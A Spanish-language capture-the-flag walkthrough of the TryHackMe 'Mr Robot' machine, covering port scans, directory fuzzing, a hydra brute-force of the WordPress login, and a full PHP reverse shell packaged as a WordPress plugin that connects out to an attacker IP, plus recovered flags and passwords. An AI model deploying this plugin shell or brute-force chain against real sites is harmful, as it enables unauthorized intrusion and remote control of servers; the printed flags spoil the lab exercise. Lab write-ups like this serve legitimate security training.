Mr Robot CTF
| Sistema operativo | Dificultad | Fecha de Lanzamiento | Creador |
|---|---|---|---|
| Linux | Medium | - | ben & tryHackme |
Reconocimiento
Lanzamos una traza ICMP a la máquina objetivo para comprobar que tengamos conectividad.
Enumeración inicial
Realizamos un escaneo con nmap para descubrir que puertos TCP se encuentran abiertos en la máquina víctima.
nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 10.10.77.209
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 09:38 -03
Initiating SYN Stealth Scan at 09:38
Scanning 10.10.77.209 [65535 ports]
Discovered open port 80/tcp on 10.10.77.209
Discovered open port 443/tcp on 10.10.77.209
Completed SYN Stealth Scan at 09:39, 28.02s elapsed (65535 total ports)
Nmap scan report for 10.10.77.209
Host is up, received user-set (0.39s latency).
Scanned at 2025-03-26 09:38:38 -03 for 28s
Not shown: 65532 filtered tcp ports (no-response), 1 closed tcp port (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 63
443/tcp open https syn-ack ttl 63
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 28.11 seconds
Raw packets sent: 131084 (5.768MB) | Rcvd: 565 (128.889KB)
Lanzamos una serie de script básicos de enumeración propios de nmap, para conocer la versión y servicio que esta corriendo bajo los puertos.
nmap -sCV -p80,443 -oN servicesScan 10.10.77.209
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 09:45 -03
Nmap scan report for 10.10.77.209 (10.10.77.209)
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.59 seconds
Explotación inicial
HTTP (80)
Realizamos Web Fuzzing usando Ffuf
ffuf -c -u http://10.10.77.209/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 200 -e .php
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.77.209/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 200
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
# directory-list-2.3-medium.txt [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 236ms]
images [Status: 301, Size: 235, Words: 14, Lines: 8, Duration: 254ms]
blog [Status: 301, Size: 233, Words: 14, Lines: 8, Duration: 242ms]
sitemap [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 317ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 442ms]
# Suite 300, San Francisco, California, 94105, USA..php [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 446ms]
# [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 451ms]
# Priority ordered case-sensitive list, where entries were found.php [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 451ms]
# This work is licensed under the Creative Commons.php [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 451ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/.php [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 451ms]
#.php [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 452ms]
#.php [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 452ms]
# [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 452ms]
# Copyright 2007 James Fisher.php [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 452ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 452ms]
# Copyright 2007 James Fisher [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 452ms]
#.php [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 454ms]
#.php [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 454ms]
# Attribution-Share Alike 3.0 License. To view a copy of this.php [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 455ms]
# or send a letter to Creative Commons, 171 Second Street,.php [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 457ms]
# on at least 2 different hosts.php [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 458ms]
# directory-list-2.3-medium.txt.php [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 463ms]
# [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 464ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 465ms]
# [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 471ms]
[Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 471ms]
# Priority ordered case-sensitive list, where entries were found [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 471ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 473ms]
# on at least 2 different hosts [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 473ms]
index.php [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 476ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 475ms]
rss [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 891ms]
video [Status: 301, Size: 234, Words: 14, Lines: 8, Duration: 226ms]
login [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 1775ms]
0 [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 3363ms]
feed [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 3358ms]
wp-content [Status: 301, Size: 239, Words: 14, Lines: 8, Duration: 228ms]
image [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 3355ms]
atom [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 3186ms]
admin [Status: 301, Size: 234, Words: 14, Lines: 8, Duration: 231ms]
audio [Status: 301, Size: 234, Words: 14, Lines: 8, Duration: 224ms]
intro [Status: 200, Size: 516314, Words: 2076, Lines: 2028, Duration: 227ms]
css [Status: 301, Size: 232, Words: 14, Lines: 8, Duration: 225ms]
wp-login.php [Status: 200, Size: 2606, Words: 115, Lines: 53, Duration: 3397ms]
wp-login [Status: 200, Size: 2606, Words: 115, Lines: 53, Duration: 3424ms]
rss2 [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 3358ms]
license [Status: 200, Size: 309, Words: 25, Lines: 157, Duration: 278ms]
wp-includes [Status: 301, Size: 240, Words: 14, Lines: 8, Duration: 229ms]
js [Status: 301, Size: 231, Words: 14, Lines: 8, Duration: 226ms]
wp-register.php [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 3383ms]
Image [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 3367ms]
wp-rss2.php [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 3399ms]
rdf [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 3489ms]
page1 [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 3410ms]
readme [Status: 200, Size: 64, Words: 14, Lines: 2, Duration: 236ms]
robots [Status: 200, Size: 41, Words: 2, Lines: 4, Duration: 228ms]
dashboard [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 3339ms]
Encontramos la primera flag.
073403c8a58a1f80d943455fb30724b9
Descargamos también fsociety.dic.
wget http://10.10.77.209/fsocity.dic
Realizamos un ataque de fuerza bruta contra el formulario de admin.
cat fsocity.dic | sort -u > wordlist.txt
hydra -l elliot -P wordlist.txt 10.10.77.209 http-post-form "/wp-login/:log=^USER^&pwd=^PASS^:The password you entered for the username" -I -t 20
elliot:ER28-0652
<?php
/**
* Plugin Name: WP Reverse Shell
* Author: D4redevil
*/
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.9.0.64'; // CHANGE THIS
$port = 4444; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
zip revshell.zip revshell.php
Nos ponemos en escucha con NetCat.
nc -lnvp 4444
Enumeración / Movimiento lateral
daemon -> robot
python3 -c 'import pty; pty.spawn("/bin/bash")'
robot:abcdefghijklmnopqrstuvwxyz
Elevación de privilegios
Encontramos el binario /usr/local/bin/nmap con el bit SUID activo.
Referencias
Post Explotación
Leemos la ultima flag
